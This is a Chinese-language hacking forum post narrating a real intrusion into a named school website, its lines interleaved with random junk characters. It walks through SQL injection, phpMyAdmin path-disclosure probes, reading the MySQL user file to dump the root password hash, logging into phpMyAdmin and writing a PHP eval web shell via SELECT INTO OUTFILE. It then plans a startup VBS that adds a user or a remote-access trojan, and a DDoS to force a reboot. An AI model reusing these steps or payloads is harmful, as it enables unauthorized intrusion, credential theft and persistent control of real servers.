第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏1 d$ {& u! i8 ?" r: g
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
9 x$ T) e) U1 B# Y) v8 ?2 g
" S; D3 F- R+ V) I7 g- i. C8 l; c
3 |$ m- K8 M% {9 F0 {% k
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , f: W6 n9 q+ _5 r' E
( @: U* f' d$ P$ p* ~那么想可以直接写入shell ,getshell有几个条件:
2 C; S" F# X. ~& t* K8 O2 t( v1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
+ _) H: Z6 d1 y1 i& K6 R& L* N2 B& J" }1 } O: x: U/ O
试着爆绝对路径: ' d- H( ~; ~# Y! [+ U% h- y
1./phpMyAdmin/index.php?lang[]=1
4 R R8 Y' w0 @8 U2./phpMyAdmin/phpinfo.php
) `+ O" x$ B5 D' z& @3./load_file() . |- _. b; o' m
4./phpmyadmin/themes/darkblue_orange/layout.inc.php , p: T. K1 z: `7 ?+ k5 V' _
5./phpmyadmin/libraries/select_lang.lib.php
1 N; L. Z( x, P# ?( j/ |, o- }: s7 H6./phpmyadmin/libraries/lect_lang.lib.php . l6 a7 j; G7 D3 t7 R0 W9 d
7./phpmyadmin/libraries/mcrypt.lib.php
$ v; c/ }# ?6 o4 c+ C0 Z8./phpmyadmin/libraries/export/xls.php
$ C9 f, |* p' [2 Q2 d( o4 r. I: O Q+ \' I
均不行........................... # H( g# S$ v- n& T7 v- p* z! O
& G' O A8 A: m+ q& v
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
% B X' I: L7 k% O. L% _
6 z! l4 g$ O0 p0 t" d2 t& M权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin . L% a+ M" Z/ m: C2 b) V
+ Z- }0 G) t: m- p3 @$ k默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 5 T( f, U6 Z. [# L! L3 L3 N7 M
L! A# W u4 k0 `敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 3 I/ b8 Z3 l5 v8 W, i4 A
5 S5 o- L4 u* w+ b ?* Q8 ]想想root还可以读,读到root密码进phpmyadmin 也可以拿shell / A, {6 h( i2 j) k+ J
$ g& D: E) t" N7 Ihttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 8 _9 u; W0 Z( Q. P) Y% v v7 Z% o) {
! y4 u( D( ^8 Z自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 0 n7 a8 ?* a9 ~' K9 s
/ d* o( I3 P$ p, P9 F
成功读到root密码:
) U3 ^" `+ P+ ?, y
. a, i( x3 ~+ }% R17---- r(0072)
$ K- A, s% N( M18---- o(006f)
7 |3 s# z p& f19---- o(006f)
8 G! E$ `+ t* X20---- t(0074)
7 y& ]& R/ w% q, c21---- *(002a) ! h) Q) m4 w3 f( ?2 K' ^$ D
22---- 8(0038) + J: Q' y+ t; A7 d( w4 m
23---- 2(0032)
+ ?7 K* M+ q+ v! @$ @8 R24---- E(0045) 1 O8 ], s; c) E5 M% U8 p- M0 i
25---- 1(0031) $ R: ]) i1 u1 s* O# m
26---- C(0043)
" v5 m$ |6 n U: [3 f27---- 5(0035)
% O: l' c! o, H# v4 b) v U: \- T28---- 8(0038)
8 f! s' J1 {6 f29---- 2(0032) $ y" ~* ?5 j1 T/ T3 l4 ^* I
30---- 8(0038)
4 l& T1 y/ |4 M; n31---- A(0041)
* ~8 F$ ~) K7 T% B32---- 9(0039)
5 @; b5 f( u- g' L0 u) e33---- B(0042) " [: u9 n+ N7 p5 `* {2 @8 g" w; [
34---- 5(0035)
5 F. {# Q8 m8 U" D% g35---- 4(0034) 0 z8 }, O" C# h- K' S7 p
36---- 8(0038) & T0 W4 y4 l, j, n9 K
37---- 6(0036) 2 F5 u/ j* p1 G9 Y! G) k/ M
38---- 4(0034)
" X* f0 i( M% y7 Q, S) y39---- 9(0039)
' Z% ~; ~: s. \/ e8 b1 Y) a40---- 1(0031) 3 x: y2 g' y5 z& Q* q
41---- 1(0031)
7 G" x- H5 W0 s4 ?2 a! |& w( h& I7 F42---- 5(0035) 0 Q$ B7 V! F9 G: P1 S _
43---- 3(0033)
% j. I" w: S# t44---- 5(0035)
6 ]4 f- A2 {2 J. b5 z45---- 9(0039)
$ i3 S) d4 X& K4 Y46---- 8(0038) * B# N. N1 L# g& h* c
47---- F(0046)
9 N7 L& v0 G8 P F; J48---- F(0046)
7 m0 a( w1 }/ H. }- x7 g49---- 4(0034) ) F9 z9 ?' m5 _
50---- F(0046) 6 a" {4 @ n( n
51---- 0(0030)
9 c: K- R* R% A3 e5 A: ?52---- 3(0033)
# i" y5 t/ d8 n/ i' x53---- 2(0032) + [! _! `! j' [- a$ Y; Y
54---- A(0041)
4 n+ T. u8 Z$ r1 H$ @6 r55---- 4(0034)
" j* I: h! y; U% B! P$ D56---- A(0041)
+ c9 n% b" r7 K7 S: E1 p57---- B(0042)
" Y' }/ x1 x2 W, f! ^. c58---- *(0044)
! o, z6 k% ~& G8 C& ~1 {( k+ F59---- *(0035) 7 ~! K. e: g1 \9 q7 s
60---- *(0041) . L: n: J8 u7 g2 G( [* a! V
61---- *0032)
2 n# ~7 D' y8 j9 [) J3 ]) \% V, W* t8 B9 b. S4 Z4 E
解密后成功登陆phpmyamin
% k7 _# m e9 _; X
$ Y+ ~, N2 R/ J% W+ g1 t; Q4 o8 F# Q: l" g7 O3 o
$ }8 ?/ f M- B; G5 W& U
, M3 ^( E' I- b# W找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' % m/ x. B& c& T+ B" ^2 \) h
' B1 S2 }6 l! @8 w6 @- w) X! l
成功执行,拿下shell,菜刀连接:
3 J0 u9 }0 B3 A, O' C0 L" R, h
0 s8 l( e9 E3 j; k服务器不支持asp,aspx,php提权无果................... 8 H ~ g6 l n3 u6 K& O
7 }8 _: N. w3 z. ~) @但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: {. D3 x' a2 _+ q
服务器上已经有个隐藏帐号了 7 E5 i5 N- \4 N) o1 v( ]" H
别名 administrators0 X+ I1 H3 }0 c2 C7 h. ]
注释 管理员对计算机/域有不受限制的完全访问权
2 e, }# B1 \5 J5 N# K* Z5 r# {' c成员 + y% @- Y3 u' B6 ^
-------------------------------------------------------------------------------) ~- d" y4 J$ Q0 {
admin$ U8 F7 o; j9 a
Administrator
& H: m5 w9 a( cslipper$
: t0 w+ r$ R7 j D9 Q" Isqluser9 T3 u& u1 u! w' N6 q
命令成功完成。 # t2 N4 N& {* D) Q
/ k( `1 R, o ^* ~$ O' D6 m8 ]8 ^1 J4 U服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
9 _ i+ {- s2 P0 k4 K6 @
: M. J/ ^3 [! m/ j' tddos服务器重启,不然就只能坐等服务器重启了...............................
$ q; Z* W( ?: I" `& C ]# l1 ?; K2 R# m" d9 n7 ^! s
8 ], [. M" W3 _4 S* c6 I
|